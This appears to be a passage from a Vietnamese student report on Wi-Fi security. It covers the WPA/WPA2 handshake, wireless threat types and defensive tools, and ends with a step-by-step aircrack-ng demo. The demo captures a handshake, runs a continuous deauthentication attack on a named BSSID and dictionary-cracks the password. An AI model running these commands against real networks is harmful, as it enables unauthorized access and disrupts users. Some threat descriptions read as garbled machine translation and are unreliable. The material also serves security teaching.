3. Buộc ngắt kết nối máy khách đã kết nối và sau đó kết nối lại để bắt các gói tin xác thực để
Brute Force khóa Pairwise Master (PMK)

29
2.3.2. Quá trình bắt tay 4 bước (4-Way Handshake)
Trong giao thức WPA/WPA2, một kết nối giữa người dùng (Client/Supplicant) với thiết
bị phát Wifi (AP/Authenticator) được khởi tạo bởi một quá trình bắt tay 4 bước (4-way
Handshake)

Hình 25: Quá trình bắt tay 4 bước


Quá trình này có thể hiểu đơn giản như sau:
Ban đầu thiết bị phát wifi (AP) và thiết bị cần gia nhập (Client) đều đã được cài đặt sẵn mật
khẩu bảo vệ mạng Wifi, Pre-Shared Key 256 bit (PSK), hay còn gọi là Pre-Shared Master Key
(PMK). PMK được lưu trữ trên AP và Client, hoàn toàn không bị truyền đi trong quá trình xác
thực truy cập mạng, khởi tạo kết nối. Quá trình 4-way Handshake được bắt đầu sau khi Client
gửi yêu cầu gia nhập mạng tới AP.
 Bước 1: thiết bị AP sinh ra một chuỗi số ngẫu nhiên gọi là ANonce và gửi tới cho Client.
 Bước 2: Client cũng tự sinh ra một chuỗi số ngẫu nhiên, gọi là SNonce. Lúc này, phía
Client sẽ sinh ra một Pairwise Temporal Key (PTK) dựa trên PMK, ANonce, SNonce,
địa chỉ MAC của Client (AA), địa chỉ MAC của AP (SA).
PTK = function(PMK, ANonce, SNonce, AA, SA)
Lúc này, Client gửi cho AP bản tin chứa giá trị SNonce dưới dạng plain text. Đồng thời,
Client sẽ sử dụng PTK vừa sinh ra để tính ra một mã băm từ SNonce gọi là Message Integrity
Code (MIC) và gửi kèm trong bản tin gửi cho AP.
 Bước 3: AP nhận được SNonce của Client. AP sử dụng thuật toán giống như phía Client
để tính ra giá trị PTK. Nếu phía Client và AP có cùng PMK thì giá trị PTK tính ra sẽ
giống nhau. Lúc này, AP sẽ sử dụng PTK vừa tính được để tính ra giá trị MIC từ SNonce,
so sánh giá trị này với MIC nhận được từ Client. Nếu MIC khớp nhau, chứng tỏ cả Client
và AP đều có cùng PMK, tức là Client này được phép truy cập vào mạng Wifi. Lúc này
AP gửi cho Client bản tin cài đặt để Client sử dụng PTK làm khoá mã cho phiên truyền.
 Bước 4: Client cài đặt khoá mã và gửi bản tin xác nhận lại cho AP. Quá trình 4-way
Handshake kết thúc. Từ đây mọi bản tin mà Client và AP trao đổi với nhau sẽ được mã

30
hoá với khoá mã vừa được cài đặt, khoá mã này chỉ có giá trị trong phiên truyền và được
tính toán để hầu như không bao giờ bị sử dụng lại.
Quá trình xác thực trong giao thức khá chặt chẽ, thông tin PMK hoàn toàn được giữ bí mật,
không truyền đi trong quá trình xác thực. Vì vậy hacker rất khó có thể giải mã được PMK chỉ
dựa vào những thông tin truyền đi. Và hầu hết các kĩ thuật tấn công Wifi hiện nay đều chỉ tập
trung vào việc bắt lấy gói tin trong quá trình 4-way Handshake để biết được các tham số SNonce,
ANonce, AA, SA, sau đó thực hiện dò giá trị PMK để cho ra kết quả phù hợp. Việc dò tìm này
chỉ có thể hiệu quả nếu mật khẩu Wifi đơn giản, với những trường hợp mật khẩu Wifi phức tạp
thì việc dò tìm là gần như không thể.

3. Mối đe dọa không dây


3.1. Các cuộc tấn công kiểm soát truy cập
Tấn công kiểm soát truy cập không dây là những cuộc tấn công bởi kẻ tấn công xâm nhập
mạng bằng cách trốn tránh tham số kiểm soát truy cập, chẳng hạn như bằng cách giả mạo địa chỉ
MAC, Rouge Điểm truy cập và cấu hình sai, v.v.

3.2. Các cuộc tấn công về tính toàn vẹn và bảo mật
Các cuộc tấn công toàn vẹn bao gồm tiêm WEP. Chèn khung dữ liệu, tấn công phát lại và
bit lật, v.v. Các cuộc tấn công bảo mật bao gồm phân tích lưu lượng, chiếm quyền điều khiển
phiên, giả mạo, bẻ khóa, tấn công MITM, v.v. để đánh chặn thông tin mật thông tin.

3.3. Các cuộc tấn công sẵn có


Các cuộc tấn công sẵn sàng bao gồm các cuộc tấn công Lụt và Từ chối dịch vụ để ngăn
chặn người dùng hợp pháp kết nối hoặc truy cập mạng không dây. Các cuộc tấn công sẵn sàng có
thể được thực hiện bằng cách xác thực tràn ngập, nhiễm độc ARP, tấn công chống xác thực, cuộc
tấn công giải thể, v.v.

3.4. Các cuộc tấn công xác thực


Tấn công xác thực nhằm mục đích đánh cắp thông tin nhận dạng hoặc mạng không dây
hợp pháp khách hàng để có được quyền truy cập vào mạng bằng cách mạo danh. Nó có thể bao
gồm Mật khẩu kỹ thuật bẻ khóa, đánh cắp danh tính, đoán mật khẩu.

3.5. Tấn công điểm truy cập giả mạo


Tấn công điểm truy cập giả mạo là một kỹ thuật trong đó một điểm truy cập giả mạo ở
một nơi có mạng không dây hợp pháp thường có cùng một SSID. Người dùng giả định kẻ lừa
đảo điểm truy cập làm điểm truy cập hợp pháp và kết nối với. Sau khi người dùng được kết nối
với điểm truy cập giả mạo, tất cả lưu lượng truy cập sẽ trực tiếp qua nó và kẻ tấn công đánh hơi
thấy gói để giám sát hoạt động.

31
3.6. Liên kết sai với khách hàng
Liên kết sai máy khách bao gồm một điểm truy cập giả mạo bên ngoài các thông số của
một công ty mạng lưới. Khi một nhân viên được kết nối với nó bằng cách bỏ qua các chính sách
bảo mật, tất cả lưu lượng truy cập sẽ đi qua kẻ tấn công.

3.7. Tấn công điểm truy cập bị cấu hình sai


Cuộc tấn công điểm truy cập bị định cấu hình sai bao gồm quyền truy cập vào điểm truy
cập hợp pháp bằng cách lấy lợi thế của các cấu hình sai của nó. Cấu hình sai có thể giống như
mật khẩu yếu, mặc định cấu hình mật khẩu, Mạng không dây không có mật khẩu bảo vệ, v.v.

3.8. Hiệp hội trái phép


Liên kết trái phép là một kỹ thuật khác mà người dùng bị nhiễm Trojan là hoạt động như
một điểm truy cập cho phép kẻ tấn công kết nối mạng công ty qua đó. Trojan này kích hoạt điểm
truy cập mềm thông qua kịch bản độc hại cho phép các thiết bị như máy tính xách tay biến các
thẻ WLAN của chúng để truyền Mạng WLAN.

3.9. Tấn công kết nối Ad Hoc


Ad Hoc là mạng không an toàn vì chúng không cung cấp xác thực và mã hóa. Kẻ tấn
công có thể cố gắng xâm phạm khách hàng trong quảng cáo chế độ hoc. Gây nhiễu tín hiệu tấn
công Các cuộc tấn công gây nhiễu tín hiệu yêu cầu tín hiệu tần số khuếch đại cao gây ra sự từ
chối của tấn công dịch vụ. Thuật toán Đa truy cập / Tránh va chạm Carrier Sense yêu cầu thời
gian chờ để truyền sau khi phát hiện va chạm.

3.10. Jamming Signal Attack


Các cuộc tấn công gây nhiễu tín hiệu yêu cầu tín hiệu tần số khuếch đại cao gây ra cuộc
tấn công Từ chối dịch vụ. Thuật toán Đa truy cập / Tránh va chạm của Carrier Sense yêu cầu thời
gian chờ để truyền sau khi phát hiện va chạm.

3.11. Hạn chế về khả năng quản trị


mạng không dây kết nối với các thiết bị sử dụng không dây, bất kỳ thiết bị điển tử đào
nằm trong vùng phủ sowngs của mạng không dây đều có thể kết nối với mạng. Chính vì thế các
đối tượng xấu có thể dễ dàng xâm nhập vào mạng không dây để tấn công người dùng.

3.12. Khả năng mã hóa dữ liệu


- Mặc dù thông tin truyền trên mạng đã được mã hóa nhằm ngăn chặn việc truy cập bất
hợp pháp, nhưng các hacker có thể sử dụng các thiết bị wifi đã được thay đổi để chặn dữ
liệu rồi giải mã chúng, tìm kiếm khóa. Sau đó truy cập trái phép vào mạng và gây nên
nhiều rắc rối cho hệ thống.
- Chỉ cần một máy tính có card mạng wifi là bạn có thể tha hồ lướt web và xâm nhập bất
hợp pháp và các mạng máy tính gia nhập mạng.

3.13. Xác thực quyền người dùng


- lỗ hổng trong quá trình xác thực người dùng giúp cho kẻ tấn công có thể tấn công vào
mạng không dây.

32
- Trong quá trình xác thực người dùng, người dùng cần phải gửi gói tin để cho AP, sau đó
AP gửi bản tin phản hồi lại cho người dùng.

4. Phương pháp hack không dây


4.1. Khám phá Wi-Fi
Bước đầu tiên trong việc hack mạng không dây để thỏa hiệp nó là tìm kiếm thông tin về
nó. Thông tin này có thể được thu thập bằng cách tạo dấu chân chủ động, thụ động cũng như sử
dụng các công cụ khác nhau. Dấu chân thụ động bao gồm đánh hơi các gói tin, sử dụng các công
cụ như "Airwaves", "NetSurveyor" và các công cụ khác để tiết lộ thông tin như mạng không dây
trực tiếp xung quanh. Dấu chân chủ động bao gồm thăm dò điểm truy cập để có được thông
tin. Trong dấu chân chủ động, kẻ tấn công gửi một yêu cầu thăm dò và điểm truy cập gửi phản
hồi thăm dò.

4.2. Ánh xạ GPS


Ánh xạ GPS là quá trình tạo danh sách các mạng Wi-Fi được phát hiện để tạo bản ghi sử
dụng GPS. GPS theo dõi vị trí của Wi-Fi được phát hiện. Thông tin này có thể được sử dụng để
bán cho kẻ tấn công hoặc hack cộng đồng.

4.3. Phân tích lưu lượng không dây


Phân tích lưu lượng truy cập của mạng không dây bao gồm bắt gói tin để tiết lộ các thông
tin như SSID phát sóng, phương pháp xác thực, kỹ thuật mã hóa, v.v. Có một số công cụ có sẵn
để nắm bắt và phân tích mạng không dây như Wireshark, Omni peek, Commview, v.v.

4.4. Khởi động các cuộc tấn công không dây


Kẻ tấn công sử dụng công cụ như Aircrack-ng và các cuộc tấn công khác như ARP
poisoning, MITM, Phân mảnh, Giả mạo MAC, Hủy xác thực, Phân tách và giả mạo điểm truy
cập để bắt đầu cuộc tấn công vào mạng không dây.

33
Hình 26: Mô hình các cuộc tấn công không dây

5. Công cụ bảo mật không dây


5.1. Hệ thống ngăn chặn xâm nhập không dây
Hệ thống ngăn chặn xâm nhập không dây (WIPS) là một thiết bị mạng cho mạng không
dây. Nó giám sát mạng không dây và bảo vệ nó khỏi các điểm truy cập trái phép và thực hiện
phòng chống xâm nhập tự động. Bằng cách giám sát phổ vô tuyến, nó ngăn chặn điểm truy cập
lừa đảo và cảnh báo cho quản trị viên mạng về phát hiện trên. Cách tiếp cận vân tay giúp tránh
các thiết bị có địa chỉ MAC giả mạo. WIPS bao gồm ba thành phần: Máy chủ, Cảm biến và Bảng
điều khiển. Điểm truy cập giả mạo cấu hình sai APs, cấu hình sai máy khách, MITM, mạng đặc
biệt, giả mạo MAC, Honeypots, tấn công DOS, v.v. có thể được giảm thiểu bằng cách sử dụng
WIPS.

5.2. Công cụ kiểm tra bảo mật Wi-Fi


Sử dụng các công cụ bảo mật không dây là một cách tiếp cận khác để bảo vệ mạng không
dây. Những phần mềm bảo mật cung cấp kiểm tra mạng không dây, khắc phục sự cố, phát hiện,
phòng chống xâm nhập, giảm thiểu mối đe dọa, phát hiện lừa đảo, bảo vệ mối đe dọa hàng ngày,
điều tra pháp y và báo cáo tuân thủ. Một số công cụ bảo mật Wi-Fi phổ biến như sau: -
 AirMagnet WiFi Analyzer
 Motorola’s AirDefense Services Platform (ADSP)
 Cisco Adaptive Wireless IPS
 Aruba RFProtect

34
IV. DEMO CRACK PASSWORD WIFI BẰNG
AIRCRACK-NG

1. Bật chế độ Monitor ở card Wifi


sudo airmon-ng check kill (để kiểm tra bất kỳ xung đột nào và loại bỏ chúng).
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ifconfig wlan0 up
[Thử nghiệm]
sudo aireplay-ng -9 wlan0
Đã bắt được sóng các wifi lân cận.

35
Hình 27: Bật chế độ Monitor ở card Wifi

36
Kết quả: Bật chế độ monitor thành công.

Hình 28: Kết quả

2. Hack mật khẩu Wifi bằng Aircrack-ng


Đầu tiên ta sử dụng lệnh (sudo airmon-ng check kill) để kiểm tra bất kỳ xung đột nào và
loại bỏ chúng.

Hình 29: Kiểm tra và loại bỏ xung đột


37
Sử dụng câu lệnh (sudo airmon-ng start wlan0) để thấy giao diện mạng không dây đang
dùng. Chúng ta có thể thấy chế độ monitor (giám sát) đã được bật.

Hình 30: Kiểm tra giao diện mạng không dây đang dùng

Chúng ta có thể chắc chắn giao diện mạng không dây hiện tại là wlan0 bằng câu lệnh
(sudo airmon-ng).

Hình 31: Mạng không dây hiện tại là wlan0


38
Tiếp đến sử dụng câu lệnh (sudo airodump-ng wlan0) để phát hiện các mạng không dây.
Như hình trên ta có thể thấy một loạt mạng không dây đã được phát hiện. Ở đây loại mạng ta
chọn là mạng 708,709,710_T2Royalmini. Chú ý kênh mà mạng đang chọn cụ thể ở đây là kênh
11.

Hình 32: Phát hiện các mạng không dây

Sử dụng câu lệnh (sudo airodump-ng -w hack1 -c 11 -bssid 0C:4B:54:9F:74:9E wlan0).

39
Hình 33: sudo airodump-ng -w hack1 -c 11 -bssid 0C:4B:54:9F:74:9E wlan0
Trong đó -c 11 là kênh chúng ta chọn, 0C:4B:54:9F:74:9E là địa chỉ MAC, hack1 là thư
mục tạo ra để lấy gói tin bắt được, với câu lệnh này ta có thể thấy BSSID và ESSID cũng như là
các tín hiệu đang được truyền đi.

Hình 34: BSSID, ESSID và các tín hiệu đang được truyền đi

40
Ta có thể thấy hiện có thiết bị đang kết nối với mạng không dây, vì vậy ta sẽ ngắt kết nối
các thiết bị đó bằng câu lệnh sau (sudo aireplay-ng --deauth 0 -a 0C:4B:54:9F:74:9E wlan0).
Trong đó câu lệnh –deauth 0 sẽ hủy xác thực của những người đang sử dụng tới mạng
wifi liên tục cho đến khi chúng ta dừng lại câu lệnh.
Khi người dùng kết nối lại với mạng wifi là lúc chúng ta bắt được gói tin chứa mật khẩu
của wifi.

41
Hình 35: Ngắt kết nối các thiết bị đang kết nối mạng không dây

Ta nhập (ls) và ta nhận được tệp hack như trên hình.

Hình 36: Tệp hack


Sử dụng câu lệnh: (sudo aircrack-ng hack1-02.cap -w /home/nguyenhoangduc-
b17dcat015/password.txt)
Trong đó nguyenhoangduc-b17dcat015/password.txt là địa chỉ thư viện mật khẩu.

42
Hình 37: sudo aircrack-ng hack1-02.cap -w /home/nguyenhoangduc-b17dcat015/password.txt

Kết quả cuối cùng là dò được mật khẩu có trong thư viện mật khẩu.

Hình 38: Dò thành công mật khẩu

V. NGUỒN THAM KHẢO

43
https://www.howkteam.vn/course/13-gioi-thieu-ve-ethical-hacking--khai-niem-hack-phan-loai-
va-cac-giai-doan/24-dau-vet--tham-do--cach-tham-do-dau-vet-phan-3-2771
https://www.thekalitools.com/2016/06/su-dung-theharvester-tim-kiem-thong-tin.html

https://www.cyberpratibha.com/blog/using-whois-a-command-for-information-gathering/

https://chousensha.github.io/blog/2017/06/27/dnsmap-kali-linux-tools/

https://www.youtube.com/watch?v=WfYxrLaqlN8&t=487s

44

You might also like